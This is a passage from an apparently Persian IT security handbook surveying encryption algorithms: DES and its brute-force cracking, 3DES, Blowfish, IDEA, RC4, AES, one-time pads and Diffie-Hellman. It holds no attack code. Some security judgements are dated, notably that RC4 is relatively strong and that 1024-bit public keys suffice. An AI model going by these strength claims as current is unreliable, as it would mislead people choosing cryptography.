‫ﺍﻟﻜﺘﺮﻭﻧﻴﻚ )‪ ٨٤(EFF‬ﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﺍﺯ ‪ ۲۵۰۰۰‬ﺩﻻﺭ ﺳﺎﺧﺘﻪ ﺷﺪ ﻭ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳﺶ ﻋﻤﻮﻣﻲ‪ ،‬ﻛﻠﻴﺪ ﺭﻣـﺰ ﻳـﻚ ﭘﻴـﺎﻡ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺩﺭ‬
‫ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺭﻭﺯ ﺩﺭ ﺑﺮﺍﺑﺮ ﭼﺸﻤﺎﻥ ﺍﻋﻀﺎﻱ ﺍﺋﺘﻼﻑ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫‪٨٥‬‬
‫‪ DES‬ﺳﻪﮔﺎﻧﻪ‬
‫‪ DES‬ﺳﻪﮔﺎﻧﻪ ﺭﻭﺷﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺳﻪ ﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ DES‬ﻭ ﺳﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ ﻛﻪ ﺟﻤﻌﹰﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﺑـﻪ‬
‫‪ ۱۶۸‬ﺑﻴﺖ ﻣﻲﺭﺳﺎﻧﺪ‪ DES ،‬ﺭﺍ ﺑﻄﻮﺭ ﭼﺸﻤﮕﻴﺮﻱ ﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ "‪ "3DES‬ﻣﻮﺳـﻮﻡ ﺍﺳـﺖ ﺩﺭ ﻣﻘﻴـﺎﺱ‬
‫ﻭﺳﻴﻌﻲ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﻧﻴﺰ ﺗﻮﺳﻂ ﭘﻮﺳﺘﺔ ﺍﻣﻦ )‪ ٨٦(SSH‬ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ‪ ،‬ﺩﻭﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ DES‬ﺑﺎ ﺩﻭ ﻛﻠﻴﺪ‬
‫ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ‪ ،‬ﺑﺪﻟﻴﻞ ﻳﻚ ﺣﻤﻠﺔ ﻣﺘﻦﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺭﻭﻳﺎﺭﻭﻳﻲ ﺩﺭ ﻣﻴﺎﻥ‪ - ٨٧‬ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻬﺎﺟﻢ ﻫﻤﺰﻣـﺎﻥ ﻛﻮﺷـﺶ ﻣـﻲﻛﻨـﺪ‬
‫ﻣﺘﻦ ﻣﻌﻤﻮﻟﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ ‪ DES‬ﻳﮕﺎﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻣﺘﻦ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ ‪ DES‬ﻳﮕﺎﻧـﺔ ﺩﻳﮕـﺮ ﺭﻣﺰﮔـﺸﺎﻳﻲ‬
‫ﻛﻨﺪ ﺗﺎ ﺩﺭ ﺁﻥ ﻣﻴﺎﻥ ﻳﻚ ﺗﻄﺎﺑﻖ ﭘﻴﺪﺍ ﺷﻮﺩ ‪ -‬ﺁﻧﻘﺪﺭ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻬﺒﻮﺩ ﻧﻤﻲﺑﺨﺸﺪ‪.‬‬

‫‪BlowFish‬‬
‫‪٨٨‬‬
‫‪ BlowFish‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﻠﻮﻛﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺳﺮﻳﻊ‪ ،‬ﺟﻤﻊ ﻭ ﺟﻮﺭ‪ ،‬ﻭ ﺳﺎﺩﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻭﺱ ﺷـﻨﻴﺮ ﺍﺑـﺪﺍﻉ ﺷـﺪ‪ .‬ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺎ ﻃﻮﻝ ﻣﺘﻐﻴﻴﺮ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺎ ‪ ۴۴۸‬ﺑﻴﺖ ﺑﺮﺳـﺪ‪ ،‬ﻭ ﺑـﺮﺍﻱ ﺍﺟـﺮﺍ ﺭﻭﻱ ﭘﺮﺩﺍﺯﺷـﮕﺮﻫﺎﻱ ‪ ۳۲‬ﺑﻴﺘـﻲ ﻭ ‪ ۶۴‬ﺑﻴﺘـﻲ‬
‫ﺑﻬﻴﻨﻪﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺯ ﺍﻧﺤﺼﺎﺭ ﺩﺭ ﺁﻣﺪﻩ ﻭ ﺩﺭ ﺣﻮﺯﺓ ﻣﺼﺮﻑ ﻫﻤﮕﺎﻧﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ‪ BlowFish .‬ﺩﺭ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﭘﻮﺳﺘﺔ ﺍﻳﻤﻦ ﻭ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬

‫‪IDEA‬‬
‫‪٩١‬‬ ‫‪٩٠‬‬ ‫‪٨٩‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺍﺩﻩ )‪ (IDEA‬ﺩﺭ ﺯﻭﺭﻳﺦ ﺳﻮﺋﻴﺲ ﺗﻮﺳﻂ ﺟﻴﻤﺰ ﺍﻝ ﻣﺎﺳﻲ ﻭ ﺯﻭﺟﻴﺎ ﻻﻱ ﭘﺪﻳـﺪ ﺁﻣﺪﻧـﺪ ﻭ ﺩﺭ ﺳـﺎﻝ‬
‫‪ ۱۹۹۰‬ﻋﻤﻮﻣﻲ ﺷﺪﻧﺪ‪ IDEA .‬ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺸﻬﻮﺭ ‪ PGP‬ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻧﺎﻣـﻪﻫـﺎﻱ‬

‫ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺩﺭ ﺻﻔﺤﺎﺕ ‪ ۱۶۹‬ﺗﺎ ‪ ۱۷۶‬ﮐﺘﺎﺏ "‪ (PUIS) "Practical Unix & Internet Security‬ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬ ‫‪۸۲‬‬
‫‪83‬‬ ‫‪Data Encryption Standard‬‬
‫‪84‬‬ ‫‪Electronic Frontier Foundation‬‬
‫‪85‬‬ ‫‪Triple-DES‬‬
‫‪86‬‬ ‫‪Secure Shell‬‬
‫‪87‬‬ ‫‪Meet in the Middle‬‬
‫‪88‬‬ ‫‪Bruce Schnier‬‬
‫‪89‬‬ ‫‪International Data Encryption Algorithms‬‬
‫‪90‬‬ ‫‪James L. Massey‬‬
‫‪91‬‬ ‫‪Xuejia Lai‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٩٦‬‬

‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻴﺸﺘﺮ ﺍﺯ ‪ IDEA‬ﺗﻮﺳﻂ ﻳﻜﺴﺮﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﻧﺤﺼﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ‪ Ascom–Tech AG‬ﺩﺭ ﺳﻮﻟﻮﺗﻮﺭﻥ ﺳﻮﺋﻴﺲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﺤﺪﻭﺩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫‪RC4‬‬
‫‪٩٢‬‬
‫ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺮﻳﺎﻧﻲ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ "ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎﻱ ‪ "RSA‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﺯ‬
‫ﻣﺤﺮﻣﺎﻧﻪ ﺗﺠﺎﺭﻱ ﻣﺨﻔﻲ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﺪ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۴‬ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻛﺎﺭﺑﺮ ﮔﻤﻨﺎﻡ ‪ UseNet‬ﺍﻓﺸﺎ ﺷﺪ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﺪ ﻧـﺴﺒﺘﹰﺎ‬
‫ﻗﻮﻱ ﺑﺎﺷﺪ‪ RC4 .‬ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻴﻦ ‪ ۱‬ﺗﺎ ‪ ۲۰۴۸‬ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪(AES) Rijndael‬‬
‫ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻮﺳﻂ ﻳﻮﻫﺎﻥ ﺩﻳﻤﻦ‪ ٩٣‬ﻭ ﻭﻳﻨﺖ ﺭﻳﺠﻤﻦ‪ ٩٤‬ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺩﺭ ﻣﺎﻩ ﺍﻛﺘﺒﺮ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ‬
‫)‪ ٩٥(NIST‬ﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺟﺪﻳﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﺸﺮﻓﺘﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ‪ Rijndeal .‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣـﺰﻱﺳـﺎﺯﻱ ﻓـﻮﻕﺍﻟﻌـﺎﺩﻩ‬
‫ﺳﺮﻳﻊ ﻭ ﺟﻤﻊ ﻭ ﺟﻮﺭ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻪ ﻃﻮﻝ ‪ ۱۲۸‬ﺗﺎ ‪ ۱۹۲‬ﻳﺎ ‪ ۲۵۶‬ﺑﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻫﺎ ﻗﺪﺭﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺑﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﻨﺘﺸﺮ ﻣﻲﺷـﻮﺩ‪ ،‬ﺳـﺎﻳﺮ ﺭﻣﺰﻧﮕﺎﺭﻫـﺎ‬
‫ﺑﺪﻧﺒﺎﻝ ﻧﻘﺎﻳﺺ ﻳﺎ ﺿﻌﻔﻬﺎﻱ ﺁﻥ ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺑﻪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺍﺑـﺪﺍﻉ ﻛـﺮﺩﻩﺍﻧـﺪ ﺍﻋﺘﻤـﺎﺩ ﻧﻜﻨﻴـﺪ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﺵ ﻛﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛﻨﻨﺪ ﺷﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺍﻋﺘﺒﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﻋﻤﻞ ﺩﻟﻴﻠﻲ ﺑﺮﺍﻱ ﻣﺨﻔﻴﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﺮﺍﮐﻪ ﺍﻣﻨﻴﺖ ﻭﺍﻗﻌﻲ ﺩﺭ ﺷﻔﺎﻓﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭﻙ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺍﻧﺘﺸﺎﺭ ﻳﺎﻓﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﺎ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺿﻤﺎﻧﺖ ﻧﻤﻲﻛﻨﺪ ﻛﻪ ﻧﻘـﺎﻳﺺ‬
‫ﺁﻥ ﻳﺎﻓﺘﻪ ﺧﻮﺍﻫﻨﺪ ﺷﺪ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ WEP‬ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﺒﻜﻪﺳﺎﺯﻱ ‪ 802.11‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﺗﺎ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ‬
‫ﻳﻚ ﻧﻘﺺ ﻣﻬﻢ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺁﻥ ﻳﺎﻓﺘﻪ ﺷﻮﺩ ﺳﺎﻟﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺖ ‪ -‬ﻧﻘﺺ ﺩﺭ ﺗﻤﺎﻡ ﺁﻥ ﻣﺪﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ‪ ،‬ﻭﻟﻲ ﻫـﻴﭽﻜﺲ ﺑـﻪ‬
‫ﺍﺷﻜﺎﻟﻲ ﺑﺮﺧﻮﺭﺩ ﻧﻜﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﻧﻘﺺ ﺑﮕﺮﺩﺩ‪.‬‬

‫‪Pad‬ﻫﺎﻱ ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ‬


‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻛﻪ ﺛﺎﺑﺖ ﺷﺪﻩ ﻧﺎﺷﻜﺴﺘﻨﻲ ﺍﺳﺖ‪ ،‬ﺳﻴﺴﺘﻢ "‪ Pad‬ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ" ﺍﺳـﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﻟﮕـﻮﺭﻳﺘﻢ‬
‫ﻃﺮﻓﻬﺎﻱ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪﻩ ﺍﺭﺗﺒﺎﻁ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻳﻚ ﺭﺷﺘﺔ ﻃﻮﻻﻧﻲ ﺍﺯ ﺑﺎﻳﺘﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ )ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﭘﻴﺎﻣﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺍﺭﺳﺎﻝ ﺷـﻮﺩ(‬
‫ﺭﺍ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ .‬ﺑﺎ ﺗﺒﺪﻳﻞ ﻫﺮ ﺑﺎﻳﺖ ﭘﻴﺎﻡ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺑﺎﻳﺖ ﻛﻠﻴﺪ‪ ،‬ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻥ ﺑﺎﻳﺖ ﻛﻠﻴـﺪ‬
‫ﺍﺯ ﺑﻴﻦ ﻣﻲﺭﻭﺩ ﻭ ﺩﻳﮕﺮ ﻫﻴﭽﮕﺎﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﺩ‪ .‬ﭼﻮﻥ ﻛﻠﻴﺪ ﺗﺼﺎﺩﻓﻲ ﻭ ﻏﻴﺮ ﺗﻜﺮﺍﺭﺷﻮﻧﺪﻩ ﺍﺳﺖ‪ ،‬ﺣﺘﻲ ﻳﻚ ﺣﻤﻠـﺔ ﺟـﺴﺘﺠﻮﻱ‬
‫ﻛﻠﻴﺪ ﻧﻴﺰ ﻋﻤﻠﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺎ ﻫﺮ ﻛﻠﻴﺪ ﺧﺎﺹ‪ ،‬ﻫﺮ ﭘﻴﺎﻡ ﻣﻤﻜﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﻟﻴﺪ ﺷﻮﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻏﻴﺮﻋﻤﻠـﻲ ﻣـﻲﻛﻨـﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﻣـﺸﻜﻼﺕ ﻣﻌﻤـﻮﻝ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ )ﺗﺒﺎﺩﻝ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻤﻦ ﻛﻠﻴﺪﻫﺎ( ﺗﻮﻟﻴﺪ ﻣﻘﺎﺩﻳﺮ ﺯﻳﺎﺩ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺍﻗﻌﹰﺎ ﺗﺼﺎﺩﻓﻲ ﻫﻤﻴﺸﻪ ﺳﺎﺩﻩ ﻧﻴـﺴﺖ‪ ،‬ﻭ ﺗﻮﺯﻳـﻊ ﻣﻘـﺎﺩﻳﺮ ﺯﻳـﺎﺩ‬
‫ﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺑـﻪ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﻠﻴﺪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻞﺳﺎﺯ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺍﻭﺻﺎﻑ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻛﻤﺎﺑﻴﺶ ﺑﺮﺍﻱ ﭘﻴﻮﻧﺪﻫﺎﻱ ﺍﺭﺗﺒـﺎﻃ ﹺ‬
‫ﺍﻣﻨﻴﺖ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﺯﻳﺎﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‬


‫ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺸﻜﻠﺘﺮ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ ﻭ ﺗﻌﺪﺍﺩ ﻛﻤﺘﺮﻱ ﺍﺯ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺭﻧﺪ‪ .‬ﭼﻮﻥ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻭ ﻧﺎﻣﺘﻘﺎﺭﻥ ﺍﺳﺎﺳﹰﺎ ﺑﻪ ﺻﻮﺭﺗﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﺑﺎ ﻣﻘﺎﻳـﺴﺔ‬

‫‪92‬‬ ‫‪Roland Rivest‬‬


‫‪93‬‬ ‫‪Joan Daemen‬‬
‫‪94‬‬ ‫‪Vinet Rijmen‬‬
‫‪95‬‬ ‫‪National Institute of Standards & Technology‬‬
‫‪٢٩٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻃﻮﻝ ﻛﻠﻴﺪﻫﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺤﻜﺎﻡ ﻧﺴﺒﻲ ﻭ ﻗﺪﺭﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﻲﺑﺮﺩ‪ .‬ﻃﻮﻝ ﻛﻠﻴﺪ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﻫﻤﮕـﺎﻧﻲ‬
‫ﻻ ﺍﺯ ‪ ۵۱۲‬ﺗﺎ ‪ ۲۰۴۸‬ﻭ ‪ ۴۰۹۶‬ﺑﻴﺖ ﺍﺳﺖ‪ ،‬ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻃـﻮﻝ ‪ ۱۰۲۴‬ﺑﻴـﺖ ﺑـﺮﺍﻱ ﺁﻳﻨـﺪﻩﺍﻱ ﻗﺎﺑـﻞ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﭘﻴﺶﺑﻴﻨﻲ ﻛﺎﻓﻲ ﺍﺳﺖ‪ .‬ﻓﻬﺮﺳﺖ ﺯﻳﺮ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﺪﺍﻭﻝ ﺍﻣﺮﻭﺯ ﺭﺍ ﺧﻼﺻﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‪:‬‬

‫‪Diffie-Hellman‬‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻣﺒﺎﺩﻟـﺔ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣﻴـﺎﻥ ﻃﺮﻓﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻁ‪ Diffie-Hellman .‬ﺩﺭ ﺣﻘﻴﻘـﺖ ﻳـﻚ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻭ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻳﻚ ﺭﻭﺵ ﺗﻮﺳﻌﻪ ﻭ ﺗﺒﺎﺩﻝ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻙ ﺭﻭﻱ ﻳﻚ ﻛﺎﻧﺎﻝ ﺍﺭﺗﺒﺎﻃﻲ ﻫﻤﮕﺎﻧﻲ ﺍﺳـﺖ‪ .‬ﺩﺭ ﻭﺍﻗـﻊ ﺩﻭ‬
